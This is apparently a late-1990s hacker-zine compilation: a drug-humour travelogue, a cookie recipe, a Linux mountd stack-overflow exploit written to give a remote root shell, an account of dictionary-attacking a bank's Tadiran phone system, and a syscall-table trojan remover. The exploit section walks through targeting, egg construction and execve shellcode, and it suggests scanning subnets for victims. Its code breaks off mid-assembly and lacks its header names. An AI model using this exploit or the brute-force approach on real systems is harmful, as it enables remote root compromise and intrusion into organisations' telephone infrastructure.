guilder is the Netherlands unit of money, and roughly resembles monopoly
money, except a guilder isn't really worth anything, whereas monopoly is
fun!). We refused, and Chico got mad. He started telling us, "WE ARE GOING TO
HAVE A PROBLEM SOON." After that, things were "STARTING TO GET VERY SERIOUS."
Finally, Chico got pissed off and broke a beer bottle and started going
insane, so r00t & h4g1s made a temporary truce and started running. After
turning several corners, the mad outlaw was still chasing after us, wielding
his broken glass in the cold winter night. We were now in the "red light
district", the physical equivalent to the place on the Internet where you can
buy whores and have sex with them, and people were looking at us funny being
chased through the streets.

Day 4:

We slept through day 4.

Day 3:

Things were getting very strange in Amsterdam. Most notably, day 3 happened
AFTER day 4. Don't ask me how. It may have related to the fungus located
within an "Inner Visions" container that we consumed in the hopes of
progressing our talks further. We played some Ultima Online, except we didn't
use any computers. I think there was a strange steakhouse experience at some
point this day, but I can't provide any further details.

Day 5:

Everything in the world is energy vibrating at different rates.
If we can find some way to make our own matter vibrate at a consistently
faster rate we can transcend the physical universe and enter the digital
plane. I think we need to switch tenses back to the past before. With Outlaw
out of the picture, we resumed our negotiations over some spacecakes (it's
like a brownie, or a muffin, or a donut, except it has Zero Day in it).

Day 6:

I thought we ate all the shrooms in Day Pi! Ok, fine. Things are easier to
handle when you have a vision. Vision is just a hallucination induced by
energy waves bouncing around in your head. Your head is cool. COOL is a lame
stock. EBAY is insanely overpriced. So are M3s. Mach 3's are cool razors.
Razors are sharp. Sharp MD players are too thick. As is Mark's cock. And long!

-r00t & h4g1s

0x2>-------------------------------------------------------------------------

A CASE STUDY: LINUX MOUNTD STACK OVERFLOW

There is nothing new here, but the code is a text book example of how buffer
overflows are done. Even if you have read other articles on buffer overflows
you might find something of value in here. Or maybe not. The case studied is
the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on Aug 28.

nuuB

<++> linenoise/mountd-sploit.c
/*
 * mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will
 * give a remote root shell.
 *
 * Cleaned up, documented and submitted to Phrack on Sep 3 1998.
 *
 * I've included a quick primer on stack overflows and made lots of comments
 * in the code, so if you don't know how these stack overflow exploits work
 * take this opportunity to learn something.
 *
 * It is trivial to extend the code (or use scripting) to make something that
 * automatically scans subnets or lists of IPs to find vulnerable systems.
 * This is left as an exercise for the enterprising young hax0rs out there.
 *
 * You need the following RPC files for your particular architecture:
 *
 *   nfsmount.h
 *   nfsmount_xdr.c
 *
 * These can be generated from 'mount.x' by the 'rpcgen' utility.
 * I simply
 * lifted the files that came pre-generated with Linux 'mount'. These are
 * included uuencoded, but they may not work on your particular system. Don't
 * bug me about this.
 *
 * Compile with:
 *
 *   cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit
 *
 * Have fun, but as always, BEHAVE!
 *
 * /nuuB
 *
 */

/*
   A QUICK PRIMER ON STACK OVERFLOWS
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed
   explanation on how to write sploits (the examples are for Linux/i386 but
   the methodology is valid for any Unix, and can be applied to other OSes
   once you understand the technique). If you are targeting one of Bill's
   OSes check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog.

   The properties that we take advantage of are:

     * The stack memory pages have the execute bit set.
     * The return addresses from functions are stored on the stack at a
       higher address than the local variables.

   MEMORY MAP

   -- Start of stack (i.e. bottom of stack - top of memory) e.g. 0xc0000000 --

      <** return address **>

   -- Top of stack (lower memory address) e.g. 0xbffff9c8 --

   THE OVERFLOW

   The trick is to overflow a local variable that is set through a function
   that doesn't check for overflows (strcpy, sprintf, etc). By supplying a
   (too) long string you can overwrite memory at higher addresses, i.e.
   closer to the start of the stack. More specifically we want to overwrite
   <** return address **> with a pointer that points back into the stack that
   contains code we want executed. Getting the code on the stack is done by
   including it in the string we are overflowing with, or by placing it in an
   environment variable.

   The code can do anything you like, but the standard thing is to execve() a
   shell. There are often limitations on what the code can look like in order
   to be placed unmangled on the stack (length, toupper(), tolower(), NULL
   bytes, path stripping etc). It all depends on how the target program
   processes the input we feed it.
   Be prepared for some tinkering to avoid certain byte patterns and to make
   the code use PC/IP relative addressing.

   The overflow string (called the 'egg') is normally passed to the target
   program through command line arguments, environment variables, TCP
   connections or in UDP packets.

   POSSIBLE COMPLICATIONS

   Sometimes you will destroy other local variables with your egg (depends on
   how the compiler ordered the variables on the stack). If you use a long
   enough egg you could also trash the arguments to the function. As your
   code isn't executed until the vulnerable function returns (not at the
   return of the function doing the actual overflowing, e.g. strcpy()), you
   must make sure that the corrupted variables don't cause a crash before the
   return. This means that your egg probably has to be aligned perfectly,
   i.e. only use one return pointer and precede it with 'correct' values for
   the local variables you are trashing.

   Unfortunately the ordering of the variables is often dependent on what
   compiler options were used. Optimization in particular can shuffle things
   around. This means that your exploit will sometimes have to target a
   particular set of options. Most of the time the trashing of other local
   variables isn't a problem but you may very well run into it some day.

   THE RETURN POINTER

   The only problem left is to guess the right address to jump to (i.e. the
   return pointer). This is done either by trial and error or by examining
   the executable (requires you have access to a system identical to the
   target). A good way to get a reasonable starting value is to find out how
   many environment variables the target process has (hint: use
   'ps uxawwwwwwwwe') and combine that with the base stack pointer (you can
   find that out with a one line program that shows the value of the stack
   pointer).
   To increase the chances of success it is customary to fill out the start
   of the egg with NOP opcodes, thus as long as the pointer happens to point
   somewhere in the egg before the actual code it will execute the NOPs then
   the code.

   That is all there is to it.
*/

/*
 * Now, back to our case study.
 *
 * Target: rpc.mountd:logging.c
 *
 *   void Dprintf(int kind, const char *fmt, ...) {
 *       char buff[1024];
 *       va_list args;
 *       time_t now;
 *       struct tm *tm;
 *
 *       if (!(kind & (L_FATAL | L_ERROR | L_WARNING))
 *           && !(logging && (kind & dbg_mask)))
 *           return;
 *       ...
 *       vsprintf(buff, fmt, args);  <-- This is where the overflow is done.
 *       ...
 *       if (kind & L_FATAL)
 *           exit(1);
 *   }                               <-- This is where our code (hopefully)
 *                                       gets executed
 *
 * This function is called from (e.g.) mountd.c in svc_req() as follows:
 *
 *   #ifdef WANT_LOG_MOUNTS
 *       Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n",
 *               inet_ntoa(addr), argbuf);
 *   #endif
 *
 * Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type
 * L_WARNING is always logged, and all we have to do is to try to mount
 * something we are not allowed to (i.e. as long as we are not included in
 * /etc/exports we will be logged and get a chance to overflow).
 *
 * The only complication is the first %s that we will have to compensate for
 * in the egg (our pointers must be aligned correctly).
 *
 * We use 5 pointers to avoid problems related to how the compiler organized
 * the variables on the stack and if the executable was compiled with or
 * without -fomit-frame-pointer.
 *
 *   3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5
 *
 * Still plenty of room left for NOPs in the egg. We do have to make sure that
 * if the 3 other variables are trashed it won't cause any problems. Examining
 * the function we see that 'now' and 'tm' are initialized after the vsprintf()
 * and are thus not a problem. However there is a call 'va_end(args)' to end
 * the processing of the ellipsis which might be a problem. Luckily this is
 * a NOP under Linux.
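 *
 * Added sidebar (not part of nuuB's sploit or of the mountd sources): the
 * defender's fix for the Dprintf() above is to bound the write. The block
 * below reimplements the logging call with vsnprintf() and reports how far
 * the original vsprintf() would have run past buff[1024]; the names
 * dprintf_bounded() and blocked_mount_overflows(), the client address and
 * the path lengths are assumptions for the example.
 */

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 1024   /* same local buffer size as mountd's Dprintf() */

/* Hardened counterpart of Dprintf(): same 1024-byte local buffer, but
 * vsnprintf() never writes past it. Returns the length the full message
 * would have had (what vsprintf() would have written, minus the NUL), so a
 * caller can see that truncation happened; the possibly truncated message
 * is copied to 'out'. */
int dprintf_bounded(char *out, size_t outsz, const char *fmt, ...)
{
    char buff[BUFF_SIZE];
    va_list args;
    int needed;

    va_start(args, fmt);
    needed = vsnprintf(buff, sizeof buff, fmt, args); /* at most 1023 chars + NUL */
    va_end(args);
    if (needed < 0)
        return -1;
    snprintf(out, outsz, "%s", buff);
    return needed;
}

/* The svc_req() logging call with a client-controlled mount path of any
 * length. Returns 1 if the original vsprintf() version would have overrun
 * buff[] (needed chars + NUL > 1024), 0 if the message fits. */
int blocked_mount_overflows(const char *client, const char *path)
{
    char msg[BUFF_SIZE];
    int needed = dprintf_bounded(msg, sizeof msg,
                                 "Blocked attempt of %s to mount %s\n",
                                 client, path);
    return needed >= BUFF_SIZE;
}

int main(void)
{
    char longpath[2048];
    char msg[BUFF_SIZE];
    int needed;

    /* Constructed input: a 2047-byte path, far longer than any real export. */
    memset(longpath, 'A', sizeof longpath - 1);
    longpath[sizeof longpath - 1] = '\0';

    printf("short path overflows: %d\n",
           blocked_mount_overflows("10.0.0.1", "/export"));
    printf("long path overflows:  %d\n",
           blocked_mount_overflows("10.0.0.1", longpath));
    needed = dprintf_bounded(msg, sizeof msg, "%s", longpath);
    printf("bounded copy kept %zu of %d chars\n", strlen(msg), needed);
    return 0;
}
```

/*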
 * Finally we might have trashed one of the arguments
 * 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind'
 * will cause an exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008).
 * Again, we are in luck. 'kind' is referenced earlier in the function and in
 * several other places so the compiler has graciously placed it in a register
 * for us. Thus we can trash the arguments all we want.
 *
 * Actually, if you examine the executables of mountd in the common distros
 * you will find that you don't have to trash any variables at all as 'buffer'
 * is placed just before the frame pointer and the return address. We could
 * have used a simple egg with just one pointer and this would have worked
 * just as well in practice.
 *
 * All this 'luck' is in fact rather common and is the reason why most buffer
 * overflows are easy to write so they work most of the time.
 *
 * Ok. Delivery of the egg is done through the RPC protocol. I won't go into
 * details here. If you are interested, get the sources for the servers and
 * clients involved. Half the fun is figuring out how to get the egg in place.
 *
 * The last piece of the puzzle is to keep shoveling data from the local
 * terminal over the TCP connection to the shell and back (remember that
 * we used dup2() to connect the shell's stdout/in/err to the TCP connection).
 *
 * Details below.
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "nfsmount.h"

/*
 * First we need to write the code we want executed.
 *
 * C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh");
 *
 * setreuid() is probably not necessary, but can't hurt.
 *
 * fork() is done to change pid. This is needed as someone - probably the
 * portmapper - sends signals to mountd (the shell has no handlers for these
 * and would die).
 *
 * The dup2()'s connect stdout/stderr to the TCP socket.
 *
 * The code assumes 'mountd' communicates with the client using descriptor
 * zero.
 * This is the case when it is started as a daemon, but may not be so if
 * it is launched from inetd (I couldn't be bothered to test this). The
 * dup2()'s may need to be changed accordingly if so.
 *
 * For Linux/i386 we would get:
 */
#if 0
void c0de()
{
    __asm__(
        "jmp .get_string_addr\n\t"      /* Trick to get address of our string */
        ".d01t:\n\t"
        "xorl %eax,%eax\n\t"
        "movl %eax,%ebx\n\t"            /* ruid=0 */
        "movl %eax,%ecx\n\t"            /* euid=0 */
        "movb $0x46,%eax\n\t"           /* __NR_setreuid */
        "int $0x8

0x3>-------------------------------------------------------------------------

Eleet ch0c0late ch1p co0kies
by Juliet

The chocolate chip cookie is an old exploit. You can use it to bribe your
teachers, sysadmins, bosses, even feds. Never underestimate the cookie.

Picture this.. little girlie walks up to you in the NOC.. offers you a
home-baked chocolate chip cookie! She must be someone's secretary.. or
something.. wow she sure fooled you.. anyway.. bake them.. they are good..
DO NOT substitute ingredients.. other than like M&M's for chocolate chips..

  1 cup (packed) golden brown sugar
  1/2 cup sugar
  1/2 cup solid vegetable shortening, room temperature
  1/2 cup (1 stick) unsalted butter, room temperature
  2 large eggs
  1 tablespoon vanilla extract
  3 cups all purpose flour
  1 teaspoon baking soda
  1 teaspoon salt
  1 12-ounce package semisweet chocolate chips

Preheat oven to 350F. Using electric mixer, beat both sugars, shortening and
butter in large bowl until light and fluffy. Beat in eggs and vanilla. Mix
flour, baking soda and salt in large bowl. Add dry ingredients to butter
mixture and mix until blended. Stir in chocolate chips. Drop dough by heaping
tablespoonfuls onto heavy large baking sheets, spacing 2 inches apart. Bake
until golden brown, about 12 minutes. Transfer baking sheets to racks; cool 5
minutes. Transfer cookies to racks; cool completely.

Makes about 42 cookies..
or you can make ONE BIG pan cookie

0x4>-------------------------------------------------------------------------

- Tadiran; Computer Telephony Integration (CTI) -

Blakboot

Introduction
============

Hello everyone. This article is primarily about Tadiran Telecommunications
software and hardware used to synchronize computer applications with phone
calls. I will be referring to system version 9.63.03.01 and any variants as
just `Tadiran`. From firsthand experiences with this type of system I've found
that they can be configured to do many things, from trunk timers to on hold
music.

Although a very powerful system, the Tadiran lacks basic security. This is a
no no, especially when it provides worldwide technologies for all types of
industries, including banking. The issue of lack of security is mainly why I
wanted to write this article. The Tadiran is very much open to intrusion.

How it began
============

A phreak friend of mine, Mf-Man, and I were scanning for loops, we found a
carrier. We took a short look at the system for a while, until our interests
waned and took us elsewhere.. Months later, bored, I dialed into the system,
with plans of throwing a dictionary file at it at a steady pace (Tadiran only
requires a password for authentication). So, I just sat back, and waited...
After a long while, to my gleeful surprise, it cracked! I (like many others
before me) did that zealous happy dance.

This system, Tadiran, is rather cryptic without documentation. Even still, I
managed to dig up some interesting info. This system I managed to get into was
that of a CTI system from a well known bank.

The major flaws thus far (I plan to write a more in depth article):

  * Unlimited password attempts.
  * No login names.
  * A password prompt that responds, well, promptly.

What follows are some screen shots of the Tadiran system.

The system
==========

Password prompt:

  ENTER PASSWORD

Bad password Msg.:

  ILL PASSWORD , TRY AGAIN !
System prompt:

  *:

Environment: Tree menus; menus branch from root, and so on.

-This is the root menu, the menu sent upon login.-

  (ROOT) CCS 9.63.03.01 SMDI & 24SDT
  Copyright (c) 1991-1997 Tadiran Telecommunications Ltd.
  NAME - xxxxxxxxx
  SAU # - xxxx

  0-CONFIG  1-DIAGN  2-TABLES  3-ADMIN  4-ROUTING/COST  5-ISDN  6-DATA
  7-CoraLINK  8-NETWORK  9-HELP

Any of the menus/options can be chosen by number, or name.

Control keys:

  ^C / ESC ------ Go back 1 menu.
  ^T       ------ Displays account and system information.

                  EXAMPLE:
                    CCS: xxxxxxxx xxx-xx-1998 10:48pm
                    Terminal No.: 4, Password level: 0
                    Software Version: 9.63.03.01 SMDI & 24SDT

  ^P       ------ Relogin.

  /* There are others--they seem to have something to do with emulation,
     and scrolling. */

Menu descriptions - meant for reference.
=========================================

This is a list of globally accessible menus, available by typing "HELP".

NOTE: I've "x"'d out all group names from the original system this
information was recovered from.

  PI MESSAGES      =(MSG)     FEAT. & AUTH.    =(FEAT)    SMDR CONTROL     =(SMDR)
  47/8T CARD_DB    =(TKDB)    FEATURE TIMERS   =(FE.T)    STATION TIMERS   =(ST.T)
  ALT ROUT TK.GRP  =(ROUT)    GROUPS           =(GROUP)   SYSTEM GEN.      =(SYSGEN)
  xxxx/xxx GROUP   =(xxxx)    xxxxxxx GROUP    =(xxxx)    SYS FEATURES     =(SFE)
  xxxx GROUP       =(xxxx)    IST/SLT CARD_DB  =(STDB)    SYS TIME SET-UP  =(TIME)
  BUSY PORTS       =(BUSY)    IST/SLT DEF.     =(SLT)     TERMINAL SET-UP  =(TERM)
  CARD DATA-BASE   =(CDB)     LCR/ROUTING      =(LCR)     TOLL BARRIER     =(TOLL)
  CARD LIST        =(CLIS)    xxxxxxxxx        =(xxx)     TONE PLAN        =(TON)
  CLASS OF SERVICE =(COS)     xxxxxxxxxxxxx    =(xxxxx)   TRUNK DEFINITION =(TRK)
  COST_CALC.       =(COST)    NUMBERING PLAN   =(NPL)     TRUNK_GROUP      =(TKGP)
  DATA SERVICES    =(DATA)    PICKUP GROUP     =(PICK)    TRUNK GRP DEF    =(TGDEF)
  xxxx CARD DB     =(DIDB)    PORT DATABASE    =(PDB)     TRUNK PORTS      =(TRUNK)
  xxx/xxx GROUP    =(DIDG)    PORT LIST        =(PLIS)    TRUNK TIMERS     =(TK.T)
  DIGITAL TRUNK    =(DTDB)    PREFERENCE       =(PREF)    WAKEUP           =(WAKEUP)
  KEY DEFINITION   =(KEY)     DIGITAL BUS LIST =(DLIS)    ZONED GROUP      =(VPZ)
  KEY PROGRAMING   =(PROG)    RINGER P.S.      =(RPS)     VFAC             =(VFAC)
  KEYSET TIMERS    =(EK.T)    SIZES DEF        =(SIZ)     GROUP CALL       =(CALL)

PI MESSAGES - Terminal setup, diag/stim.

47/8T CARD_DB - Card information.
  EXAMPLE:
    LS_RING_PAUS (sec)- 5
    GS_RING_PAUS (sec)- 1
    O/G BREAK_TIME(ms)- 60
    O/G MAKE_TIME (ms)- 40
    O/G INTERDGT_T(ms)- 800
    GS_DISCONNECT (ms)- 800
    METER (4TMR) : f0 (0=16K,1=12K,2=50Hz)- 0
    f0 ACCURACY +/-(1-10)% - 3
    METER_AFTER_DISCONNECT (Y/N) - N

ALT ROUT TK.GRP - Add, display, update, or remove trunk group.

BUSY PORTS - Displays what ports are busy.

CARD DATA-BASE - Lists many submenus of cards, in which you may get/update.

CARD LIST - EXAMPLE:

    shelf#/slot#  p_type   i_type   card_db#  vers/subver  status
      0 / 1       NO_CARD  NO_CARD  ---       ---  ---     ------
      0 / 2       8DTR/S   NO_CARD  ---       17   8       ACTIVE
      0 / 3       T1       T1       1         14   38      ACTIVE

CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on trunk
  control. TENANTS deals with group access.

COST_CALC. - Information about costs for certain services, at various times.

DIGITAL TRUNK - Card/trunk information, configuration, channel signaling.

KEY DEFINITION - Telephone configuration
  EXAMPLE:
    prm_cos- 1  sec_cos- 1  priv_libs- 12  terminal- N  origin- N  block- N
    o/g_tk_rest- N  privacy- Y  excl_hold- N  hard_hold- N  last_num- Y
    security- N  att- Y  auto_unatt-N  passcode- NONE  check_out- N
    multi_app- Y  m.a.mute_ring-Y  mute_ring- Y  auto_ans- N  idle_disp.-Y
    keyclick- Y  music- Y  music_num- 0  v_page_in- Y  auto_ans_v_p- Y
    auto_hld/xfer/off-1  spkr_on/off-Y  blind_att- N  pcc- Y  pc_acd- N
    mic- Y  comb_audio-N  display_size- NO_DSP  language-DEFAULT  but_num- 2
    ksi- N  ksi_type- 0  eis- N  send_id- Y  ali- NONE  aoc-e_display-N
    alert_makecall-N  active dpem id's- NONE  installed dpems- 1
    dkt: spkr_environment- 1  music_on_hold - 0

KEYSET TIMERS - EXAMPLE: 1 unit = 0.1 sec.
    AUTO_ANSWER - 10
    AUTO_ANS_V_PAGE - 10
    TONE_TO_IDLE - 10
    AOC-E_DISPLAY - 300
    MUTE_RING - 50

FEAT. & AUTH - Authorizations, and system features. Check here to see if
  Call trace OR caller ID is active.

FEATURE TIMERS - This is a bit interesting.
  EXAMPLE:
    *   (1 unit = 1.0 sec)
    **  (1 unit = 0.1 sec)
    *** (1 unit = 0.01 sec)

    *AUTO_REDIAL- 30      *REMIND_SNOOZE- 60     *WAKEUP_SNOOZE- 60
    **WAKEUP_RING - 300   **NET_FEATURE_ACK- 40  **SUSP_OFFHK- 5
    BELL_RING:  **ON_BELL - 10  **OFF_BELL - 20
    **ATT.MSG- 50         **EXPENSIVE_ROUTE_TONE - 10
    **RING- 100           **SUPV_RECALL- 3600    **CONF_SUPV_RECALL- 1800
    **BREAK_IN/OUT- 10
    BREAKIN_WARNING:  **ON - 1  **OFF - 20

GROUPS - List of submenus, of groups.

IST/SLT CARD_DB - Ring information.

IST/SLT DEF. - Slot of line info.
  EXAMPLE:
    prm_cos- 0  sec_cos- 0  priv_libs- 3  terminal- N  origin- N  block- N
    o/g_tk_rest-N  privacy- Y  excl_hold-N  hard_hold- N  last_num- Y
    security- N  att- N  auto_unatt-N  passcode- NONE  check_out- N  type- 1
    announcer- N  multi_app- N  send_id- Y  ali- NONE  opx- N  hf_relevant-Y
    music_on_hold-0

LCR/ROUTING - Libraries, update, or display.

NUMBERING PLAN - Lines, and their features: UPDATE, DISPLAY, ADD, REMOVE, or
  SHOW

STATION TIMERS - EXAMPLE: 1 unit = 0.1 sec.
    RING- 450  MULT_APR_RING- 200  BUSY- 1200  REORDER- 50  CONFIRM- 30
    DVMS- 200  HOLD- 6000  HARD_HOLD- 1200  PARK- 1200  PAGE_Q- 600
    1st_DGT - 100  INTERDGT- 150  FEAT_DIAL- 700  HKFLS_FILTER- 10
    MAGNETO_AUTO_ANS- 30  CF_NO_ANS- 200

SYSTEM GEN - MENU: (SYSGEN)
    0-INSTALL  1-SIZES_DEF  2-SIZES_TAB  3-SPEED_CALLS (MCC only)  4-MUSIC
    5-TIME_SLOTS (4GC only)  0-TRUNK_CALLS_OUTGOING

SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/incomplete,
  call_forwarding, camp_on, hotel, messaging, tones, diagnostics, ISDN,
  network, and wireless

TONE PLAN - EXAMPLE:
  ~~~~~~~~
  NO NAME       TYPE #SEG 1TN Msec 2TN Msec 3TN Msec 4TN Msec 5TN Msec 6TN Msec
   0 Busy         3    2    3  500   0  500   0    0   0    0   0    0   0    0
   1 Dial         1    0    1    0   0    0   0    0   0    0   0    0   0    0
   2 Distinct.    1    0    4    0   0    0   0    0   0    0   0    0   0    0
   3 Reorder      3    2    3  240   0  240   0    0   0    0   0    0   0    0
   4 Ringback     3    2    2 2000   0 4000   0    0   0    0   0    0   0    0
   5 Silence      1    0    0    0   0    0   0    0   0    0   0    0   0    0
   6 Tick         3    2    5   60   0 1000   0    0   0    0   0    0   0    0
   8 Confirm      3    2    1  100   0  100   0    0   0    0   0    0   0    0
   9 BRK_In/Out   1    0    5    0   0    0   0    0   0    0   0    0   0    0
  11 V.P Conf     3    2    3  100   5  100   0    0   0    0   0    0   0    0
  12 Z.P Warn     3    2    6  300   3  100   0    0   0    0   0    0   0    0
  14 LCR_expens   2    6    0  120   5   80   0  120   5   80   0  120   5   80
  15 LCR_cheap    2    4    0  120   5   80   0  120   5   80   0    0   0    0
  16 Call Wait    3    4    5  600   0 5000   0 5000   0 5000   0    0   0    0
  17 DISA Dial    1    0    1    0   0    0   0    0   0    0   0    0   0    0

TRUNK DEFINITION - EXAMPLE:
    DISA (0-NO /1-IMMED. /2-DELAY)- 0  COS.- 10  TK_TIMER#- 1
    TYPE (0-PULSE /1-DTMF /2-MIX)- 1  I/C_ONLY-N  O/G_ONLY-N  BUSY_OUT-N
    AUTO_GUARD-N  HOT_IMMED-N  HOT_DELAY-N  DROP_NO_DIAL-N  RSRVD_TO- NONE
    CALLER_ID_TIMEOUT - 50

TRUNK TIMERS - EXAMPLE:
    H.FLASH(10ms)- 67
    INCOMING : E&M_SEIZE_TO_WINK- 1  E&M_CONT_WINK_TIME- 2
    OUTGOING : E&M_CONT_WINK/SG_DELAY- 1  SEIZE_TO_DIAL- 15
               SECOND_DIAL_TONE- 60

VFAC - Account maintenance. - Requires password.

---The ones that I didn't list were either self-explanatory, or N/A

0x5>-------------------------------------------------------------------------

------------------------------------------------------------------------------
b t r o m   b y   r i q
------------------------------------------------------------------------------

"trojan eraser or i want my system call table clean"

------------------------------------------------------------------------------
i n t r o d u c t i o n
------------------------------------------------------------------------------

The other day, I started to play with the itf that appeared in P52-18 (read
that article if you want to know what it does, etc). It occurred to me one good
way to determine if someone has installed the trojan (and to subsequently
remove it) is by fixing the system call table. This program tries to do that.
This works with the Linux x86 2.0 and 2.2 series.
------------------------------------------------------------------------------
i n t e r n a l s
------------------------------------------------------------------------------

The program first attempts to detect if you are using a BIG_KERNEL (a bzImage)
or not (a zImage). One of the differences is the address of the kernel in
memory. BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000.

The system call table (sct) has the entries of all the system calls. If you
modify the sct, the new entry must be `out of range'. btrom will try to fix
these `out of range' system calls with their original values. They are taken
from the System.map.

What I mean with "`out of range'" is an entry that has a value outside of
start_of_the_kernel and the_start_of_the_kernel + some_value. This value is in
the config.h.

------------------------------------------------------------------------------
q u i c k   i n s t a l l
------------------------------------------------------------------------------

compile:
--------

1) edit config.h and Makefile. Modify them if you want.

   $ vi config.h
   $ vi Makefile

2) make

   $ make

use:
----

1) be root

   $ su -

2) install the module mbtrom

   # insmod mbtrom

3) run btrom

   # ./btrom _nr_mbtrom_ [options]

4) uninstall the module mbtrom

   # rmmod mbtrom

------------------------------------------------------------------------------
c h a c h a r a
------------------------------------------------------------------------------

1st part: detect trojans

legends

  [ ] this is ok. don't worry.
  [N] this is a null entry in the system call table. don't worry.
  [-] this is the entry of the module mbtrom. don't worry.
  [?] this entry has a system function, but it was supposed to be null. worry.
  [*] this is probably a trojan in a reserved space. worry.
  [!] this is probably a trojan in a not reserved space. worry.

2nd part: clean trojans

legends

  [DEL: press 's' to fill this entry with the System.map's value.
        press 'c' to clean this entry.
        it will be filled with a null entry.
        press 'm' to put a manual hex address in this entry.
        press 'i' to ignore, skip, what you want.

------------------------------------------------------------------------------
n o t e s
------------------------------------------------------------------------------

This program doesn't uninstall trojan modules. This program disables the
trojans, so, after that, you can uninstall the trojan with 'rmmod'.

------------------------------------------------------------------------------
b u g s
------------------------------------------------------------------------------

If `insmod mbtrom' doesn't return any value, it is because you are redirecting
that message with syslogd. Please check /etc/syslog.conf and see "kern".

------------------------------------------------------------------------------
h i s t o r y
------------------------------------------------------------------------------

* version 0.3 (01/12/98)
  compatible with kernel 2.0 and 2.2. works with BIG_KERNEL and with SMALL.
  english version

* version 0.2 (25/11/98)
  first version

* version 0.1 (21/11/98)
  something really ugly

* all this happened when I saw the itf (integrated trojan facility in P52-18)

------------------------------------------------------------------------------
f e e d b a c k
------------------------------------------------------------------------------

riq@ciudad.com.ar

<++> linenoise/btrom/Makefile
#
# Makefile for b t r o m
#
## BUG.
This must be the same as the one in config.h SYSTEM_MAP = "/usr/src/linux/System.map" AWK = awk CC = gcc #CFLAGS = -DSYSTEM_MAP=$(SYSTEM_MAP) all: parse btrom mbtrom parse: $(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h btrom: btrom.o $(CC) btrom.c -O2 -Wall -o btrom mbtrom: $(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c clean: rm -f mbtrom.o btrom.o btrom sys_null.h <--> <++> linenoise/btrom/btrom.c /* * btrom - Borra Trojanos Modulo * por Riq * 1/Dic/98: 0.3 - Compatible con kernel 2.2 y soporta BIG_KERNEL * 25/Nov/98: 0.2 - Version inicial. Soporta kervel 2.0 i386 */ #include #include #include #include #include #include #include #include #include "config.h" #include "sys_null.h" FILE *sm; FILE *au; int quiet; int borrar; int dif_n_s; unsigned int big_kernel; /****************************************************************** ***** System.map ******************************************************************* *****/ int sm_b_x_nom( unsigned int *address, char *estoy ) { char buffer[200]; char sys_add[20]; fseek(sm,0L,SEEK_SET); while( fgets(buffer,200,sm) ) { if( fnmatch(estoy,buffer,0)==0 ) { strncpy(sys_add,buffer,8); sys_add[8]=0; *address = strtoul(sys_add,(char **)NULL,16); return 1; } } return 0; } int sm_busca_x_nombre( unsigned int *address, char *estoy) { char nombre[50]; sprintf(nombre,"*T sys_%s\n",estoy); return sm_b_x_nom(address, nombre); } FILE* sm_open() { return fopen( SYSTEM_MAP, "r" ); } /****************************************************************** ***** asm/unistd.h ******************************************************************* *****/ void au_dame_el_nombre( char *dst, char *orig ) { int i,j; j=i=0; while( orig[i]!='_' ) i++; i=i+5; while( orig[i]!=' ' && orig[i]!='\t' ) dst[j++]=orig[i++]; dst[j]=0; } int au_b_x_num( char *nombre, int numero ) { char buffer[200]; char buscar[50]; /* FIXME: ?sera mas efectivo regexec() que fnmatch()? 
     */
    sprintf(buscar,AU_PREFIX"%i*",numero);
    while( fgets(buffer,200,au) ) {
        if( fnmatch(buscar,buffer,0)==0 ) {
            au_dame_el_nombre(nombre,buffer);
            return 1;
        }
    }
    /* Not found... so a second pass from the beginning */
    fseek(au,0L,SEEK_SET);
    while( fgets(buffer,200,au) ) {
        if( fnmatch(buscar,buffer,0)==0 ) {
            au_dame_el_nombre(nombre,buffer);
            return 1;
        }
    }
    return 0;
}

int au_busca_x_numero(char *nombre, int numero)
{
    return au_b_x_num(nombre,numero);
}

FILE* au_open()
{
    return fopen( ASM_UNISTD, "r" );
}

/*****************************************/
/* Common to the first and second pass   */
/*****************************************/
int comun_1er_2da( int j, int i , char *nombre , char *c, int clean,
                   unsigned int retval )
{
    int a;

    a = clean;                          /* bug fix */
    nombre[0]=0;
    /* i!=0 because asm/unistd.h from kernel 2.2 doesn't list entry 0 */
    if( i!=0 && au && au_busca_x_numero(nombre,i)) {
        if( retval > big_kernel + LIMITE_SYSCALL ) {
            *c = '*' ;                  /* trojan in a reserved entry */
            clean++;
        } else
            *c = ' ';
    } else {
        if( retval > big_kernel+LIMITE_SYSCALL )
            *c = '!';                   /* trojan in a non reserved entry */
        else
            *c = '?';                   /* a routine where a null was expected */
        clean++;
    }
    if(i==j) {                          /* the btrom module itself */
        *c='-';
        clean=a;
    } else if(retval==SYS_NULL || retval==0) { /* Null pointer */
        *c='N';
        clean=a;
    }
    return clean;
}

/******************************************************************
 * primer_recorrida: detect trojans
 ******************************************************************/
int primer_recorrida(int j)
{
    char nombre[50];
    unsigned int address;
    int i,old_clean,clean;
    unsigned int retval;
    char c;

    old_clean=clean=0;
    printf( "\n1st part: Detect trojans\n"
            "                    [ ]=OK  [N]=Null  [-]=btrom\n"
            "                    [?]=Mmm...syscall\n"
            "   Address          [*][!]=trojan routine\n"
            "   now     System.map Num [ ] Syscall Name\n"
            "----------------------------------------------\n");
    for( i=0; i< NR_syscalls; i++ ){
        /* mbtrom mode 0: returns sys_call_table[i] */
        __asm__ volatile ( "int $0x80"
                           : "=a" (retval)
                           : "0"(j), "b"((long)(i)), "c"((long)(0)), "d"((long)(0)) );
        clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
        if( !quiet || clean > old_clean ) {
